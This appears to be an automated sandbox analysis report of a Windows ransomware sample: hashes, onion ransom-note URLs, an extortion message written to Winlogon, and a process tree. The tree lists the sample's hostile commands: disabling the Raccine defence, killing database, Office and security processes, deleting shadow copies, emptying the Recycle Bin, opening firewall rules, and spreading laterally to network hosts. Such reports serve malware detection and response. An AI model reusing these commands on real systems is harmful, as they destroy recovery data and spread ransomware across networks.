Analysis
-
max time kernel
50s -
max time network
75s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
12-05-2021 00:06
Static task
static1
Behavioral task
behavioral1
Sample
e1f063d6_by_Libranalysis.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
e1f063d6_by_Libranalysis.exe
Resource
win10v20210408
General
-
Target
e1f063d6_by_Libranalysis.exe
-
Size
142KB
-
MD5
e1f063d63a75e0e0e864052b1a50ab06
-
SHA1
75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
-
SHA256
8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
-
SHA512
25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454
http://prometheusdec.in/ticket.php?track=141-5D9-Y454
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454
http://prometheusdec.in/ticket.php?track=141-5D9-Y454
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
pid Process 1324 ctkacaxe.exe 1288 ctkacaxe.exe 1160 ctkacaxe.exe 3812 ctkacaxe.exe 3836 ctkacaxe.exe 3680 ctkacaxe.exe 2864 ctkacaxe.exe 3096 ctkacaxe.exe 1244 ctkacaxe.exe -
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk e1f063d6_by_Libranalysis.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" e1f063d6_by_Libranalysis.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" e1f063d6_by_Libranalysis.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
pid Process 3668 taskkill.exe 2808 taskkill.exe 1176 taskkill.exe 3096 taskkill.exe 3772 taskkill.exe 3812 taskkill.exe 1344 taskkill.exe 2196 taskkill.exe 2856 taskkill.exe 1704 taskkill.exe 2100 taskkill.exe 3716 taskkill.exe 2104 taskkill.exe 3588 taskkill.exe 3904 taskkill.exe 1424 taskkill.exe 3744 taskkill.exe 3632 taskkill.exe 492 taskkill.exe 3784 taskkill.exe 3908 taskkill.exe 628 taskkill.exe 3916 taskkill.exe 3892 taskkill.exe 3052 taskkill.exe 3764 taskkill.exe 3784 taskkill.exe 4052 taskkill.exe 1428 taskkill.exe 3768 taskkill.exe 1144 taskkill.exe 3012 taskkill.exe 3976 taskkill.exe 3804 taskkill.exe 3456 taskkill.exe 2252 taskkill.exe 3008 taskkill.exe 2752 taskkill.exe 2364 taskkill.exe 3984 taskkill.exe 1164 taskkill.exe 3920 taskkill.exe 3492 taskkill.exe 988 taskkill.exe 3824 taskkill.exe 496 taskkill.exe 1244 taskkill.exe 3252 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3976 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3824 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 636 e1f063d6_by_Libranalysis.exe Token: SeDebugPrivilege 3632 taskkill.exe Token: SeDebugPrivilege 3096 taskkill.exe Token: SeDebugPrivilege 3772 taskkill.exe Token: SeDebugPrivilege 492 taskkill.exe Token: SeDebugPrivilege 2104 taskkill.exe Token: SeDebugPrivilege 3716 taskkill.exe Token: SeDebugPrivilege 2252 taskkill.exe Token: SeDebugPrivilege 3812 taskkill.exe Token: SeDebugPrivilege 3588 taskkill.exe Token: SeDebugPrivilege 3668 taskkill.exe Token: SeDebugPrivilege 496 taskkill.exe Token: SeDebugPrivilege 3008 taskkill.exe Token: SeDebugPrivilege 3984 taskkill.exe Token: SeDebugPrivilege 1344 taskkill.exe Token: SeDebugPrivilege 2752 taskkill.exe Token: SeDebugPrivilege 2196 taskkill.exe Token: SeDebugPrivilege 2856 taskkill.exe Token: SeDebugPrivilege 3784 taskkill.exe Token: SeDebugPrivilege 4052 taskkill.exe Token: SeDebugPrivilege 2808 taskkill.exe Token: SeDebugPrivilege 1144 taskkill.exe Token: SeDebugPrivilege 3012 taskkill.exe Token: SeDebugPrivilege 1244 taskkill.exe Token: SeDebugPrivilege 1176 taskkill.exe Token: SeDebugPrivilege 3892 taskkill.exe Token: SeDebugPrivilege 3052 taskkill.exe Token: SeDebugPrivilege 3252 taskkill.exe Token: SeDebugPrivilege 1424 taskkill.exe Token: SeDebugPrivilege 1704 taskkill.exe Token: SeDebugPrivilege 1428 taskkill.exe Token: SeDebugPrivilege 3764 taskkill.exe Token: SeDebugPrivilege 3804 taskkill.exe Token: SeDebugPrivilege 3492 taskkill.exe Token: SeDebugPrivilege 3744 taskkill.exe Token: SeDebugPrivilege 988 taskkill.exe Token: SeDebugPrivilege 3824 taskkill.exe Token: SeDebugPrivilege 3768 taskkill.exe Token: SeDebugPrivilege 3908 taskkill.exe Token: SeDebugPrivilege 1164 taskkill.exe Token: SeDebugPrivilege 2100 taskkill.exe Token: SeDebugPrivilege 628 taskkill.exe Token: SeDebugPrivilege 3916 taskkill.exe Token: SeDebugPrivilege 3456 taskkill.exe Token: SeDebugPrivilege 3784 taskkill.exe Token: SeDebugPrivilege 3920 taskkill.exe Token: SeDebugPrivilege 3904 taskkill.exe Token: SeDebugPrivilege 2364 taskkill.exe Token: SeDebugPrivilege 2860 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe 636 e1f063d6_by_Libranalysis.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 636 wrote to memory of 3632 636 e1f063d6_by_Libranalysis.exe 75 PID 636 wrote to memory of 3632 636 e1f063d6_by_Libranalysis.exe 75 PID 636 wrote to memory of 2856 636 e1f063d6_by_Libranalysis.exe 77 PID 636 wrote to memory of 2856 636 e1f063d6_by_Libranalysis.exe 77 PID 636 wrote to memory of 3976 636 e1f063d6_by_Libranalysis.exe 79 PID 636 wrote to memory of 3976 636 e1f063d6_by_Libranalysis.exe 79 PID 636 wrote to memory of 2888 636 e1f063d6_by_Libranalysis.exe 81 PID 636 wrote to memory of 2888 636 e1f063d6_by_Libranalysis.exe 81 PID 636 wrote to memory of 2960 636 e1f063d6_by_Libranalysis.exe 83 PID 636 wrote to memory of 2960 636 e1f063d6_by_Libranalysis.exe 83 PID 636 wrote to memory of 2736 636 e1f063d6_by_Libranalysis.exe 84 PID 636 wrote to memory of 2736 636 e1f063d6_by_Libranalysis.exe 84 PID 636 wrote to memory of 3620 636 e1f063d6_by_Libranalysis.exe 85 PID 636 wrote to memory of 3620 636 e1f063d6_by_Libranalysis.exe 85 PID 636 wrote to memory of 1508 636 e1f063d6_by_Libranalysis.exe 89 PID 636 wrote to memory of 1508 636 e1f063d6_by_Libranalysis.exe 89 PID 636 wrote to memory of 2248 636 e1f063d6_by_Libranalysis.exe 91 PID 636 wrote to memory of 2248 636 e1f063d6_by_Libranalysis.exe 91 PID 636 wrote to memory of 3892 636 e1f063d6_by_Libranalysis.exe 93 PID 636 wrote to memory of 3892 636 e1f063d6_by_Libranalysis.exe 93 PID 636 wrote to memory of 3908 636 e1f063d6_by_Libranalysis.exe 95 PID 636 wrote to memory of 3908 636 e1f063d6_by_Libranalysis.exe 95 PID 636 wrote to memory of 4024 636 e1f063d6_by_Libranalysis.exe 97 PID 636 wrote to memory of 4024 636 e1f063d6_by_Libranalysis.exe 97 PID 636 wrote to memory of 716 636 e1f063d6_by_Libranalysis.exe 98 PID 636 wrote to memory of 716 636 e1f063d6_by_Libranalysis.exe 98 PID 636 wrote to memory of 3096 636 e1f063d6_by_Libranalysis.exe 101 PID 636 wrote to memory of 3096 636 e1f063d6_by_Libranalysis.exe 101 PID 636 wrote to memory of 492 636 e1f063d6_by_Libranalysis.exe 102 PID 636 wrote to memory of 492 636 e1f063d6_by_Libranalysis.exe 102 PID 636 wrote to memory of 3772 636 e1f063d6_by_Libranalysis.exe 105 PID 636 wrote to memory of 3772 636 e1f063d6_by_Libranalysis.exe 105 PID 636 wrote to memory of 3716 636 e1f063d6_by_Libranalysis.exe 107 PID 636 wrote to memory of 3716 636 e1f063d6_by_Libranalysis.exe 107 PID 636 wrote to memory of 2104 636 e1f063d6_by_Libranalysis.exe 109 PID 636 wrote to memory of 2104 636 e1f063d6_by_Libranalysis.exe 109 PID 636 wrote to memory of 2252 636 e1f063d6_by_Libranalysis.exe 111 PID 636 wrote to memory of 2252 636 e1f063d6_by_Libranalysis.exe 111 PID 636 wrote to memory of 3812 636 e1f063d6_by_Libranalysis.exe 113 PID 636 wrote to memory of 3812 636 e1f063d6_by_Libranalysis.exe 113 PID 636 wrote to memory of 3588 636 e1f063d6_by_Libranalysis.exe 115 PID 636 wrote to memory of 3588 636 e1f063d6_by_Libranalysis.exe 115 PID 636 wrote to memory of 3668 636 e1f063d6_by_Libranalysis.exe 117 PID 636 wrote to memory of 3668 636 e1f063d6_by_Libranalysis.exe 117 PID 636 wrote to memory of 496 636 e1f063d6_by_Libranalysis.exe 119 PID 636 wrote to memory of 496 636 e1f063d6_by_Libranalysis.exe 119 PID 636 wrote to memory of 3008 636 e1f063d6_by_Libranalysis.exe 121 PID 636 wrote to memory of 3008 636 e1f063d6_by_Libranalysis.exe 121 PID 636 wrote to memory of 3984 636 e1f063d6_by_Libranalysis.exe 123 PID 636 wrote to memory of 3984 636 e1f063d6_by_Libranalysis.exe 123 PID 636 wrote to memory of 1344 636 e1f063d6_by_Libranalysis.exe 125 PID 636 wrote to memory of 1344 636 e1f063d6_by_Libranalysis.exe 125 PID 636 wrote to memory of 2752 636 e1f063d6_by_Libranalysis.exe 127 PID 636 wrote to memory of 2752 636 e1f063d6_by_Libranalysis.exe 127 PID 636 wrote to memory of 2196 636 e1f063d6_by_Libranalysis.exe 129 PID 636 wrote to memory of 2196 636 e1f063d6_by_Libranalysis.exe 129 PID 636 wrote to memory of 2856 636 e1f063d6_by_Libranalysis.exe 131 PID 636 wrote to memory of 2856 636 e1f063d6_by_Libranalysis.exe 131 PID 636 wrote to memory of 3784 636 e1f063d6_by_Libranalysis.exe 133 PID 636 wrote to memory of 3784 636 e1f063d6_by_Libranalysis.exe 133 PID 636 wrote to memory of 4052 636 e1f063d6_by_Libranalysis.exe 136 PID 636 wrote to memory of 4052 636 e1f063d6_by_Libranalysis.exe 136 PID 636 wrote to memory of 2808 636 e1f063d6_by_Libranalysis.exe 137 PID 636 wrote to memory of 2808 636 e1f063d6_by_Libranalysis.exe 137 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" e1f063d6_by_Libranalysis.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" e1f063d6_by_Libranalysis.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" e1f063d6_by_Libranalysis.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" e1f063d6_by_Libranalysis.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:636 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3632
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:2856
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:3976
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:2888
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:2960
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:2736
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:3620
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1508
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:2248
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:3892
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:3908
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4024
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:716
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:492
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3668
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:496
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:3976
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3252
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3744
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:988
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3768
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3916
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:3892
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:3008
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:2168
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:404
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:3116
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:492
-
-
C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe"C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe" \\10.10.0.29 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"2⤵
- Executes dropped EXE
PID:1324
-
-
C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe"C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"2⤵
- Executes dropped EXE
PID:1160
-
-
C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe"C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe" \\10.10.0.12 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"2⤵
- Executes dropped EXE
PID:1288
-
-
C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe"C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe" \\10.10.0.38 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"2⤵
- Executes dropped EXE
PID:3812
-
-
C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe"C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe" \\10.10.0.20 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"2⤵
- Executes dropped EXE
PID:3836
-
-
C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe"C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe" \\10.10.0.22 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"2⤵
- Executes dropped EXE
PID:3680
-
-
C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe"C:\Users\Admin\AppData\Local\Temp\ctkacaxe.exe" \\10.10.0.41 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"2⤵
- Executes dropped EXE
PID:2864
-
-
